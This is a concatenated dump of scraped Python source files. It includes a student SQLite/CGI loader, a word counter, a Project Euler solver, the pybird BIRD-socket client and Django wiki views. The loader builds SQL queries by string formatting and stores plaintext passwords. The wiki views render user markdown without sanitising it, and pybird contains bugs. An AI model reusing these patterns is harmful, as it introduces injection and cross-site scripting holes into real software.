(\"{co}\")'.format(co=course)) \r\n # Obtain number of columns in courses table\r\n c.execute('PRAGMA table_info(courses)')\r\n colNum = len(c.fetchall())\r\n \r\n # If num columns is < num people in courses, add cols\r\n while (colNum < len(users) + 1):\r\n colName = \"mate_no\"+str(colNum)\r\n print (\"Creating: \"+colName)\r\n c.execute('ALTER TABLE courses ADD COLUMN \"{col}\" TEXT'.format(col=colName))\r\n c.execute('PRAGMA table_info(courses)')\r\n colNum = len(c.fetchall())\r\n \r\n # Now input into row\r\n counter = int(1)\r\n \r\n for user in users:\r\n print (user,course)\r\n colName = \"mate_no\"+str(counter)\r\n print (\"Doin \"+colName)\r\n c.execute('UPDATE courses SET {col} = (\"{zid}\") WHERE course = \"{co}\"'.format(col=colName, zid=user[0], co = course))\r\n counter += 1\r\n conn.commit()\r\n \r\n\t\r\n\t\r\ndef extract_user_class(user_filename, user):\t\r\n\t# Initialise to unset variables\r\n\tID = re.sub(r'^.*/', '', user)\r\n\tname = None\r\n\temail = None\r\n\tpassword = None\r\n\tbirthday = None\r\n\tmates = None\r\n\ttown = None\r\n\tlat = None\r\n\tlong = None\r\n\tprogram = None\r\n\tcourses = None\r\n\twith open(user_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\tx,y = re.split('=', line, 2)\r\n\t\t\ty = re.sub(\"\\s*$\", \"\", y)\r\n\t\t\tif (x == \"full_name\"):\r\n\t\t\t\tname = y\r\n\t\t\telif (x == \"email\"):\r\n\t\t\t\temail = y\r\n\t\t\telif (x == \"password\"):\r\n\t\t\t\tpassword = y\r\n\t\t\telif (x == \"birthday\"):\r\n\t\t\t\tbirthday = y\r\n\t\t\telif (x == \"mates\"):\r\n\t\t\t\tmates = y\r\n\t\t\telif (x == \"home_suburb\"):\r\n\t\t\t\ttown = y\r\n\t\t\telif (x == \"home_latitude\"):\r\n\t\t\t\tlat = y\r\n\t\t\telif (x == \"home_longitude\"):\r\n\t\t\t\tlong = y\r\n\t\t\telif (x == \"program\"):\r\n\t\t\t\tprogram = y.replace('\\n','')\r\n\t\t\telif (x == \"courses\"):\r\n\t\t\t\tcourses = y\r\n\tu = User(ID, name, email, password, birthday, mates, town, lat, long, program, courses)\r\n\treturn u\r\n\t\r\ndef extract_posts(post_filename, post, userID):\r\n\t# Initialise unset variables \r\n\tID = userID+\"_\"+ re.sub(r'^.*/.*/', '', post)\r\n\tauthor = None\r\n\tmessage = None\r\n\ttime = None\r\n\tlat = None\r\n\tlong = None\r\n\t\r\n\t# Checks if there are any comments for the post by checking if directory exists\r\n\tif (os.path.isdir(os.path.join(post,'comments'))):\r\n\t\tcomments = 1 \r\n\telse:\r\n\t\tcomments = 0\r\n\t\r\n\twith open(post_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\targs = line.partition('=')\r\n\t\t\tx = args[0]\r\n\t\t\ty = args[2]\r\n\t\t\tif (x == \"from\"):\r\n\t\t\t\tauthor = y\r\n\t\t\t\tauthor = re.sub(\"\\n\", \"\", author)\r\n\t\t\telif (x == \"message\"):\r\n\t\t\t\toldMessage = y\r\n\t\t\t\tmessage = re.sub(r'\"', '!@#$%^&*', oldMessage) # Getting caught by the \"\", make sure to regex revert when displaying message\r\n\t\t\telif (x == \"time\"):\r\n\t\t\t\ttime = timeConversion(y)\r\n\t\t\telif (x == \"latitude\"):\r\n\t\t\t\tlat = y\r\n\t\t\telif (x == \"longitude\"):\r\n\t\t\t\tlong = y\r\n\tp = Post(ID, author, message, time, lat, long, comments)\r\n\treturn p\r\n\r\ndef extract_comments(comments_filename, c, ID):\r\n\t# Initialise unset variables \r\n\tID = ID+\"_\"+ re.sub(r'^.*/.*/.*/', '', c)\r\n\tauthor = None\r\n\tmessage = None\r\n\ttime = None\r\n\twith open(comments_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\targs = line.partition('=')\r\n\t\t\tx = args[0]\r\n\t\t\ty = args[2]\r\n\t\t\tif (x == \"from\"):\r\n\t\t\t\tauthor = y\r\n\t\t\t\tauthor = re.sub(\"\\n\", \"\", author)\r\n\t\t\telif (x == \"message\"):\r\n\t\t\t\toldMessage = y\r\n\t\t\t\tmessage = re.sub(r'\"', '!@#$%^&*', oldMessage) # Getting caught by the \"\", make sure to regex revert when displaying message\r\n\t\t\telif (x == \"time\"):\r\n\t\t\t\ttime = timeConversion(y)\r\n\tc = Comment(ID, author, message, time)\r\n\treturn c\r\n\r\n# Replaces timestamp with a nicer format, from http://stackoverflow.com/questions/17494250/convert-timestamps-of-yyyy-mm-ddthhmmss-sssz-format-in-python\r\ndef timeConversion(string):\r\n\tnewTime = datetime.strptime(string[:-5], \"%Y-%m-%dT%H:%M:%S+\")\r\n\t#newTime = time.strftime('%I:%M - %b %d, %Y')\r\n\treturn newTime\t\r\n\t\r\n\r\ncreate_users_table()\r\ncreate_mates_table()\r\ncreate_all_posts_table()\r\nusers_dir = \"dataset-medium\"\r\nparameters = cgi.FieldStorage()\r\ninput_users(users_dir, parameters)\r\nextract_programs()\r\nextract_courses()\r\nc.close()\r\nconn.close()\r\n","sub_path":"subjects/cs2041/public_html/ass2/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":11539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289346171","text":"# Next feature: import random\nimport string\n\nDebug = 1\n\nTargetWords = [\"the\",\"The\"]\n\n# Predicate: Debug\ndef debug():\n if Debug > 0:\n return True\n else:\n return False\n\n\n# Predicate: Verbose Debug\ndef verbose():\n if Debug > 1:\n return True\n else:\n return False\n\n\n# Read single line from standard in and handle EOF\ndef safe_input(prompt):\n try:\n wordInput = input(prompt)\n return(wordInput, True)\n except EOFError:\n return(\"\", False)\n\n\n# Process single line of input\ndef check_line(word,theCount,skipCount,uWords,uFirstLetter):\n if word in TargetWords:\n theCount = theCount + 1\n if verbose():\n print(\"Count %d. %s\" % (theCount, word))\n else:\n if verbose():\n print(\"Skip '%s' \" % (word))\n skipCount = skipCount + 1\n\n # Do other statistics gathering\n if word not in uWords:\n uWords.append(word)\n\n if word[0].isalpha() and (word[0].lower() not in uFirstLetter):\n uFirstLetter.append(word[0].lower())\n\n return(theCount,skipCount,uWords,uFirstLetter)\n\n\n# Process all input\ndef process_input(theCount,skipCount,uWords,uFirstLetter):\n cFlag = True\n while cFlag:\n word, cFlag = safe_input(\"\")\n if not cFlag:\n break\n theCount,skipCount,uniqueWords,uniqueFirstLetter = check_line(word,theCount,skipCount,uWords,uFirstLetter)\n\n return(theCount,skipCount,uWords,uFirstLetter)\n\n\n# Process input, then output statistics\n#\t\"Extreme\" example of avoiding global variables\ndef main():\n theCount,skipCount,uniqueWords,uniqueFirstLetter = process_input(0,0,[],[])\n\n if debug():\n print(\"Target Words: \", TargetWords)\n print(\"Found count %d. Skipped %d. All words %d.\" %\n (theCount, skipCount, theCount + skipCount))\n if verbose():\n print(uniqueWords)\n print(\"Unique word count: %d.\" % (len(uniqueWords)), uniqueWords[0:5])\n uniqueFirstLetter.sort()\n print(\"Found %s\" % \"\".join(uniqueFirstLetter))\n print(\"Alphabet %s\" % string.ascii_lowercase)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/word-counter/v3/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293403486","text":"# Counting summations\n# Problem 76\n\n# It is possible to write five as a sum in exactly six different ways:\n\n# 4 + 1\n# 3 + 2\n# 3 + 1 + 1\n# 2 + 2 + 1\n# 2 + 1 + 1 + 1\n# 1 + 1 + 1 + 1 + 1\n\n# How many different ways can one hundred be written as a sum of at least two positive integers?\n\nimport time\nimport math\n\ndef solve(n):\n tStart = time.time()\n ways = [[0 for _ in range(n+2)] for _ in range(n+2)]\n print(getWays(n, n-1, ways)) \n print(\"Run Time = \" + str(time.time() - tStart))\n \ndef getWays(sum, maxSummand, ways):\n if maxSummand >= sum:\n return 1 + getWays(sum, sum-1, ways)\n if not ways[sum][maxSummand] == 0:\n return ways[sum][maxSummand]\n w = 0\n # w = sum(list(map(lambda i: getWays(sum-i,i, ways), range(1, maxSummand+1))))\n for i in range(1, maxSummand+1):\n w += getWays(sum-i, i, ways)\n ways[sum][maxSummand] = w\n return w","sub_path":"problem76.py","file_name":"problem76.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260757913","text":"from builtins import str\nfrom builtins import next\nfrom builtins import object\n\nimport re\nimport socket\nfrom datetime import datetime, timedelta\n\n\nclass PyBird(object):\n ignored_field_numbers = [0, 1, 13, 1008, 2002, 9001]\n\n def __init__(self, socket_file, dummy=False):\n \"\"\"Basic pybird setup.\n Required argument: socket_file: full path to the BIRD control socket.\"\"\"\n self.socket_file = socket_file\n self.clean_input_re = re.compile('\\W+')\n self.field_number_re = re.compile('^(\\d+)[ -]')\n self.routes_field_re = re.compile('(\\d+) imported, (\\d+) exported')\n self.dummy = dummy\n\n def get_bird_status(self):\n \"\"\"Get the status of the BIRD instance. Returns a dict with keys:\n - router_id (string)\n - last_reboot (datetime)\n - last_reconfiguration (datetime)\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'communities': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'communities': '65520:1234'},\n ]\n query = \"show status\"\n data = self._send_query(query)\n\n line_iterator = iter(data.splitlines())\n data = {}\n\n for line in line_iterator:\n line = line.strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1011:\n # Parse the status section, which looks like:\n # 1011-Router ID is 195.69.146.34\n # Current server time is 10-01-2012 10:24:37\n # Last reboot on 03-01-2012 12:46:40\n # Last reconfiguration on 03-01-2012 12:46:40\n data['router_id'] = self._parse_router_status_line(line)\n line = next(line_iterator) # skip current server time\n data['last_reboot'] = self._parse_router_status_line(\n next(line_iterator), parse_date=True)\n data['last_reconfiguration'] = self._parse_router_status_line(\n next(line_iterator), parse_date=True)\n\n return data\n\n def _parse_router_status_line(self, line, parse_date=False):\n \"\"\"Parse a line like:\n Current server time is 10-01-2012 10:24:37\n optionally (if parse_date=True), parse it into a datetime\"\"\"\n data = line.strip().split(' ', 3)[-1]\n if parse_date:\n return datetime.strptime(data, '%d-%m-%Y %H:%M:%S')\n else:\n return data\n\n def get_peer_prefixes_announced(self, peer_name):\n \"\"\"Get prefixes announced by a specific peer, without applying\n filters - i.e. this includes routes which were not accepted\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'community': '65520:1234'},\n ]\n clean_peer_name = self._clean_input(peer_name)\n query = \"show route table T_%s all protocol %s\" % (\n clean_peer_name, clean_peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_exported(self, peer_name):\n \"\"\"Get prefixes exported TO a specific peer\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'community': '65520:1234'},\n ]\n clean_peer_name = self._clean_input(peer_name)\n query = \"show route all table T_%s export %s\" % (\n clean_peer_name, clean_peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_accepted(self, peer_name):\n \"\"\"Get prefixes announced by a specific peer, which were also\n accepted by the filters\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n ]\n query = \"show route all protocol %s\" % self._clean_input(peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_rejected(self, peer_name):\n announced = self.get_peer_prefixes_announced(peer_name)\n accepted = self.get_peer_prefixes_accepted(peer_name)\n\n announced_prefixes = [i['prefix'] for i in announced]\n accepted_prefixes = [i['prefix'] for i in accepted]\n\n rejected_prefixes = [\n item for item in announced_prefixes if item not in accepted_prefixes]\n rejected_routes = [item for item in announced if item[\n 'prefix'] in rejected_prefixes]\n return rejected_routes\n\n def get_prefix_info(self, prefix, peer_name=None):\n \"\"\"Get route-info for specified prefix\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n ]\n query = \"show route for %s all\" % prefix\n if (peer_name is not None):\n query += \" protocol %s\" % peer_name\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def _parse_route_data(self, data):\n \"\"\"Parse a blob like:\n 0001 BIRD 1.3.3 ready.\n 1007-2a02:898::/32 via 2001:7f8:1::a500:8954:1 on eth1 [PS2 12:46] * (100) [AS8283i]\n 1008-\tType: BGP unicast univ\n 1012-\tBGP.origin: IGP\n BGP.as_path: 8954 8283\n BGP.next_hop: 2001:7f8:1::a500:8954:1 fe80::21f:caff:fe16:e02\n BGP.local_pref: 100\n BGP.community: (8954,620)\n [....]\n 0000\n \"\"\"\n lines = data.splitlines()\n routes = []\n\n route_summary = None\n\n line_counter = -1\n while line_counter < len(lines) - 1:\n line_counter += 1\n line = lines[line_counter].strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1007:\n route_summary = self._parse_route_summary(line)\n\n route_detail = None\n if field_number == 1012:\n if not route_summary:\n # This is not detail of a BGP route\n continue\n\n # A route detail spans multiple lines, read them all\n route_detail_raw = []\n while 'BGP.' in line:\n route_detail_raw.append(line)\n line_counter += 1\n line = lines[line_counter]\n # this loop will have walked a bit too far, correct it\n line_counter -= 1\n\n route_detail = self._parse_route_detail(route_detail_raw)\n\n # Save the summary+detail info in our result\n route_detail.update(route_summary)\n routes.append(route_detail)\n # Do not use this summary again on the next run\n route_summary = None\n if field_number == 8001:\n # network not in table\n return []\n return routes\n\n def _parse_route_summary(self, line):\n \"\"\"Parse a line like:\n 2a02:898::/32 via 2001:7f8:1::a500:8954:1 on eth1 [PS2 12:46] * (100) [AS8283i]\n \"\"\"\n # Note that split acts on sections of whitespace - not just single\n # chars\n elements = line.strip().split()\n return {'prefix': elements[0], 'peer': elements[2]}\n\n def _parse_route_detail(self, lines):\n \"\"\"Parse a blob like:\n 1012-\tBGP.origin: IGP\n BGP.as_path: 8954 8283\n BGP.next_hop: 2001:7f8:1::a500:8954:1 fe80::21f:caff:fe16:e02\n BGP.local_pref: 100\n BGP.community: (8954,620)\n \"\"\"\n attributes = {}\n\n for line in lines:\n line = line.strip()\n # remove 'BGP.'\n line = line[4:]\n parts = line.split(\": \")\n if len(parts) == 2:\n (key, value) = parts\n else:\n # handle [BGP.atomic_aggr:]\n key = parts[0].strip(\":\")\n value = True\n\n if key == 'community':\n # convert (8954,220) (8954,620) to 8954:220 8954:620\n value = value.replace(\",\", \":\").replace(\n \"(\", \"\").replace(\")\", \"\")\n\n attributes[key] = value\n\n return attributes\n\n def get_peer_status(self, peer_name=None):\n \"\"\"Get the status of all peers or a specific peer.\n\n Optional argument: peer_name: case-sensitive full name of a peer,\n as configured in BIRD.\n\n If no argument is given, returns a list of peers - each peer represented\n by a dict with fields. See README for a full list.\n\n If a peer_name argument is given, returns a single peer, represented\n as a dict. If the peer is not found, returns None.\n \"\"\"\n dummy_data = [\n {'up': True, 'state': 'dummy', 'last_change': datetime.now() - timedelta(days=2),\n 'routes_imported': 1, 'routes_exported': 10, 'router_id': \"192.168.1.1\"},\n {'up': True, 'state': 'dummy', 'last_change': datetime.now() - timedelta(days=20),\n 'routes_imported': 1, 'routes_exported': 10, 'router_id': \"192.168.12.42\"},\n {'up': False, 'state': 'dummy', 'last_change': datetime.now() -\n timedelta(hours=2), },\n ]\n\n if peer_name:\n if self.dummy:\n peering_id = int(peer_name[2:])\n return dummy_data[peering_id % 3]\n query = 'show protocols all \"%s\"' % self._clean_input(peer_name)\n else:\n if self.dummy:\n return dummy_data\n query = 'show protocols all'\n\n data = self._send_query(query)\n peers = self._parse_peer_data(data=data, data_contains_detail=True)\n\n if not peer_name:\n return peers\n\n if len(peers) == 0:\n return None\n elif len(peers) > 1:\n raise ValueError(\n \"Searched for a specific peer, but got multiple returned from BIRD?\")\n else:\n return peers[0]\n\n def _parse_peer_data(self, data, data_contains_detail):\n \"\"\"Parse the data from BIRD to find peer information.\"\"\"\n lineiterator = iter(data.splitlines())\n peers = []\n\n peer_summary = None\n\n for line in lineiterator:\n line = line.strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1002:\n peer_summary = self._parse_peer_summary(line)\n if peer_summary['protocol'] != 'BGP':\n peer_summary = None\n continue\n\n # If there is no detail section to be expected,\n # we are done.\n if not data_contains_detail:\n peers.append_peer_summary()\n continue\n\n peer_detail = None\n if field_number == 1006:\n if not peer_summary:\n # This is not detail of a BGP peer\n continue\n\n # A peer summary spans multiple lines, read them all\n peer_detail_raw = []\n while line.strip() != \"\":\n peer_detail_raw.append(line)\n line = next(lineiterator)\n\n peer_detail = self._parse_peer_detail(peer_detail_raw)\n\n # Save the summary+detail info in our result\n peer_detail.update(peer_summary)\n peers.append(peer_detail)\n # Do not use this summary again on the next run\n peer_summary = None\n\n return peers\n\n def _parse_peer_summary(self, line):\n \"\"\"Parse the summary of a peer line, like:\n PS1 BGP T_PS1 start Jun13 Passive\n\n Returns a dict with the fields:\n name, protocol, last_change, state, up\n (\"PS1\", \"BGP\", \"Jun13\", \"Passive\", False)\n\n \"\"\"\n elements = line.split()\n\n try:\n if ':' in elements[5]: # newer versions include a timestamp before the state\n state = elements[6]\n else:\n state = elements[5]\n up = (state.lower() == \"established\")\n except IndexError:\n state = None\n up = None\n\n raw_datetime = elements[4]\n last_change = self._calculate_datetime(raw_datetime)\n\n return {\n 'name': elements[0],\n 'protocol': elements[1],\n 'last_change': last_change,\n 'state': state,\n 'up': up,\n }\n\n def _parse_peer_detail(self, peer_detail_raw):\n \"\"\"Parse the detailed peer information from BIRD, like:\n\n 1006- Description: Peering AS8954 - InTouch\n Preference: 100\n Input filter: ACCEPT\n Output filter: ACCEPT\n Routes: 24 imported, 23 exported, 0 preferred\n Route change stats: received rejected filtered ignored accepted\n Import updates: 50 3 19 0 0\n Import withdraws: 0 0 --- 0 0\n Export updates: 0 0 0 --- 0\n Export withdraws: 0 --- --- --- 0\n BGP state: Established\n Session: external route-server AS4\n Neighbor AS: 8954\n Neighbor ID: 85.184.4.5\n Neighbor address: 2001:7f8:1::a500:8954:1\n Source address: 2001:7f8:1::a519:7754:1\n Neighbor caps: refresh AS4\n Route limit: 9/1000\n Hold timer: 112/180\n Keepalive timer: 16/60\n\n peer_detail_raw must be an array, where each element is a line of BIRD output.\n\n Returns a dict with the fields, if the peering is up:\n routes_imported, routes_exported, router_id\n and all combinations of:\n [import,export]_[updates,withdraws]_[received,rejected,filtered,ignored,accepted]\n wfor which the value above is not \"---\"\n\n \"\"\"\n result = {}\n\n route_change_fields = [\n \"import updates\", \"import withdraws\", \"export updates\", \"export withdraws\"]\n\n lineiterator = iter(peer_detail_raw)\n\n for line in lineiterator:\n line = line.strip()\n (field, value) = line.split(\":\", 1)\n value = value.strip()\n\n if field.lower() == \"routes\":\n routes = self.routes_field_re.findall(value)[0]\n result['routes_imported'] = int(routes[0])\n result['routes_exported'] = int(routes[1])\n\n if field.lower() in route_change_fields:\n (received, rejected, filtered, ignored, accepted) = value.split()\n key_name_base = field.lower().replace(' ', '_')\n self._parse_route_stats(\n result, key_name_base + '_received', received)\n self._parse_route_stats(\n result, key_name_base + '_rejected', rejected)\n self._parse_route_stats(\n result, key_name_base + '_filtered', filtered)\n self._parse_route_stats(\n result, key_name_base + '_ignored', ignored)\n self._parse_route_stats(\n result, key_name_base + '_accepted', accepted)\n\n if field.lower() == \"neighbor id\":\n result['router_id'] = value\n\n return result\n\n def _parse_route_stats(self, result_dict, key_name, value):\n if value.strip() == \"---\":\n return\n result_dict[key_name] = int(value)\n\n def _extract_field_number(self, line):\n \"\"\"Parse the field type number from a line.\n Line must start with a number, followed by a dash or space.\n\n Returns a tuple of (field_number, cleaned_line), where field_number\n is None if no number was found, and cleaned_line is the line without\n the field number, if applicable.\n \"\"\"\n matches = self.field_number_re.findall(line)\n\n if len(matches):\n field_number = int(matches[0])\n cleaned_line = self.field_number_re.sub('', line).strip('-')\n return (field_number, cleaned_line)\n else:\n return (None, line)\n\n def _calculate_datetime(self, value):\n \"\"\"Turn the BIRD date format into a python datetime.\"\"\"\n now = datetime.now()\n # Case 1: YYYY-MM-DD HH:MM:SS\n try:\n return datetime(int(value[:4]), int(value[5:7]), int(value[8:10]), int(value[11:13]), int(value[14:16]), int(value[17:19]))\n except ValueError:\n pass\n\n # Case 1: YYYY-MM-DD\n try:\n return datetime(int(value[:4]), int(value[5:7]), int(value[8:10]))\n except ValueError:\n pass\n\n # Case 3: HH:mm timestamp\n try:\n parsed_value = datetime.strptime(value, \"%H:%M\")\n result_date = datetime(\n now.year, now.month, now.day, parsed_value.hour, parsed_value.minute)\n\n if now.hour < parsed_value.hour or (now.hour == parsed_value.hour and now.minute < parsed_value.minute):\n result_date = result_date - timedelta(days=1)\n\n return result_date\n\n except ValueError:\n # It's a different format, keep on processing\n pass\n\n # Case 4: \"Jun13\" timestamp\n try:\n # Run this for a (fake) leap year, or 29 feb will get us in trouble\n parsed_value = datetime.strptime(\"1996 \" + value, \"%Y %b%d\")\n result_date = datetime(\n now.year, parsed_value.month, parsed_value.day)\n\n if now.month <= parsed_value.month and now.day < parsed_value.day:\n # This may have an off-by-one-day issue with leap years, but\n # that's not important\n result_date = result_date - timedelta(days=365)\n\n return result_date\n except ValueError:\n pass\n\n # Case 5: plain year\n try:\n year = int(value)\n return datetime(year, 1, 1)\n except ValueError:\n raise ValueError(\"Can not parse datetime: [%s]\" % value)\n\n def _send_query(self, query):\n \"\"\"Open a socket to the BIRD control socket, send the query and get\n the response.\n \"\"\"\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.connect(self.socket_file)\n sock.send(query + \"\\n\")\n\n data = ''\n prev_data = None\n\n while (data.find(\"\\n0000\") == -1) and (data.find(\"\\n8003\") == -1) and (data.find(\"\\n0013\") == -1) and (data.find(\"\\n9001\") == -1) and (data.find(\"\\n8001\") == -1):\n data += sock.recv(1024)\n if data == prev_data:\n raise ValueError(\"Could not read additional data from BIRD\")\n prev_data = data\n\n sock.close()\n return str(data)\n\n def _clean_input(self, input):\n \"\"\"Clean the input string of anything not plain alphanumeric chars,\n return the cleaned string.\"\"\"\n return self.clean_input_re.sub('', input).strip()\n","sub_path":"pybird/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"361834149","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django import forms\nfrom markdown import markdown\nfrom random import choice\nfrom . import util\n\n# Search Form\nclass SearchForm(forms.Form):\n search = forms.CharField(label='', required=True, widget = forms.TextInput(attrs={'placeholder':'Search Encyclopedia', 'autocomplete':'off'}))\n\n# New Page Form\nclass NewPage(forms.Form):\n title = forms.CharField(widget=forms.TextInput(attrs={'style':'display:block; margin-bottom:1rem;'}))\n content = forms.CharField(widget=forms.Textarea(attrs={'style':'display:block; height:200px;'}))\n\n# Edit Page Form\nclass EditPage(forms.Form):\n content = forms.CharField(widget=forms.Textarea(attrs={'style':'display:block; height:200px;'}))\n\n# If \"/\" is visited, list of entries will be returned\ndef index(request):\n form = SearchForm(request.POST)\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries(),\n \"form\": form\n })\n\n# If \"/wiki\" is visited\ndef wiki(request, title):\n # If \"Edit\" was clicked on wiki page\n if request.method == \"POST\":\n return HttpResponseRedirect(f\"{reverse('wiki:edit')}?title={title}\")\n form = SearchForm(request.POST)\n # Get data from entry which has name that user inserted after /\n data = util.get_entry(title)\n # If data is None, render error page\n if not data:\n message = \"Page not found.\"\n return error(request, message)\n # With markdown library change data to html and render wiki/entry page\n html = markdown(data)\n return render(request, \"encyclopedia/wiki/wiki.html\", {\n \"title\": title,\n \"html\": html,\n \"form\": form\n })\n\n# If search is visited via link (GET) or via form submission (POST)\ndef search(request):\n form = SearchForm(request.POST)\n if request.method == \"POST\":\n # Create a new form with SearchForm class\n if form.is_valid():\n search = form.cleaned_data[\"search\"]\n return HttpResponseRedirect(f\"{reverse('wiki:search')}?search_term={search}\")\n else:\n # Create a new form with SearchForm class\n form = SearchForm(request.POST)\n # Assign form input to search_term variable\n search_term = request.GET.get(\"search_term\")\n # If search tearm is in markdown entries redirect to that term\n if search_term in util.list_entries():\n return HttpResponseRedirect(f\"wiki/{search_term}\")\n # For each entry where search term is substring pass to list which will be presented in HTML as list item\n entries = []\n no_results = \"\" \n for entry in util.list_entries():\n if search_term in entry:\n entries.append(entry)\n # If there is no result for search input, \"No results\" will be printed out\n if len(entries) < 1:\n no_results = \"No results.\"\n return render(request, \"encyclopedia/search.html\", {\n \"form\": form,\n \"entries\": entries,\n \"no_results\": no_results\n })\n\n# If new \"Create New Page\" is clicked\ndef new(request):\n form = SearchForm(request.POST)\n new_page_form = NewPage(request.POST)\n # Check if \"Create New Page\" is visited by link or is submited\n if request.method == \"POST\":\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n # On button click check if same title exists\n if title not in util.list_entries():\n util.save_entry(title, content)\n # Redirect user to new entry's page\n return HttpResponseRedirect(f\"wiki/{title}\")\n # Return error if page with same title exists\n else:\n message = \"Page with same title already exists.\"\n return error(request, message)\n return render(request, \"encyclopedia/new.html\", {\n \"form\":form,\n \"new_page_form\":new_page_form\n })\n\n# If \"Random Page\" is clicked\ndef random(request):\n # Get random value from entries and redirect to that page\n value = choice(util.list_entries())\n return HttpResponseRedirect(f\"wiki/{value}\")\n\n\n\n# If \"Edit\" is clicked\ndef edit(request):\n form = SearchForm()\n # Get title from entry where \"Edit\" was clicked\n title = request.GET.get(\"title\")\n edit_form = EditPage(initial = {\"content\": util.get_entry(title)})\n\n if request.method == \"POST\":\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n util.save_entry(title, content)\n return HttpResponseRedirect(f\"wiki/{title}\")\n\n return render(request, \"encyclopedia/edit.html\", {\n \"form\": form,\n \"title\": title,\n \"edit_form\": edit_form\n })\n\n\n# Error page\ndef error(request, message):\n form = SearchForm()\n return render(request, \"encyclopedia/error.html\", {\n \"form\": form,\n \"message\": message\n })","sub_path":"wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"505679928","text":"import tensorflow as tf\n\nflags = tf.flags\n\nflags.DEFINE_string(\"mode\", \"train\", \"Running mode train/debug/test\")\n\ndef main(_):\n config = flags.FLAGS\n if config.mode == \"train\":\n print('this is train')\ndef test(_):\n print('this is test')\n\nif __name__ == \"__main__\":\n # 主函数中的tf.app.run()会调用main,并传递参数,因此必须在main函数中设置一个参数位置。\n # 如果要更换main名字,只需要在tf.app.run( )中传入一个指定的函数名即可。\n # default肯定是main啦\n tf.app.run(test)\n","sub_path":"test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"66633456","text":"from MainProject.tweetCollection import tweetCollection\nfrom MainProject.priceCollection import priceCollection\nfrom MainProject.autoCollect import autoCollectThreading\nfrom MainProject.viewInterface import view\n\n\nclass Controller:\n def __init__(self):\n self.running = 1\n\n def chooseFunction(self):\n print(\"Welcome to Plutus. This program might make you rich!\")\n print(\"What would you like to do?\")\n print(\"Your choices: \\n 1. Collect tweets and crypto prices right now.\\n\"\n \"2. Collect tweets and crypto prices automatically.\\n\"\n \"3. Analyse a currency of your choice.\\n \"\n \"4. Convert the price of a cryptocurrency to the price of a FIAT currency.\")\n while self.running:\n choice = input(\"Please choose what you want to do. (1 / 2 / 3 / 4 ) \")\n if choice == \"1\":\n priceCollection().collectPrice()\n tweetCollection().callapi()\n break\n if choice == \"2\":\n print(\"Tweets will now be collected twice a day while this is running.\\n\"\n \"Cryptocurrency prices will be collected once every hour.\")\n autoCollectThreading().run()\n break\n if choice == \"3\":\n view()\n break\n if choice == \"4\":\n #converterFunction\n break\n\n print(\"This was not a valid input! Please try again.\")\n\n\n","sub_path":"Loser_Groups/Group_2/SourceFiles/MainProject/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"346942458","text":"import argparse\nimport json\nimport os\nimport pandas as pd\nimport time\nimport torch\nimport numpy as np\n\nimport train_methods\nimport query_methods\nimport utils_filereader\nfrom bhmtorch_cpu import BHM3D_PYTORCH, BHM_REGRESSION_PYTORCH, BHM_VELOCITY_PYTORCH\nfrom plot_methods import BHM_PLOTTER\n\n\"\"\"\n- features are the kernel distance thing to hinge points?\n- output is a scalar value (ie: the velocity long X-Y plane, X-Z plane, or Z-Y plane)?\n- How do you determine what the hinge points are?\n - query_dist in config file determines how frequently to space the hinge points?\n - How do you determine how big the total grid is on which to draw the hinge points?\n- What are the partitions?\n\n- What exactly is the model learning? How can information about whether or not a space is\noccupied, etc. be gleaned from the current features?\n\n- Try making regression grid 3d\n - will this break the plotting??\n\n- train velocity\n- query velocity\n\"\"\"\n\n\ndef 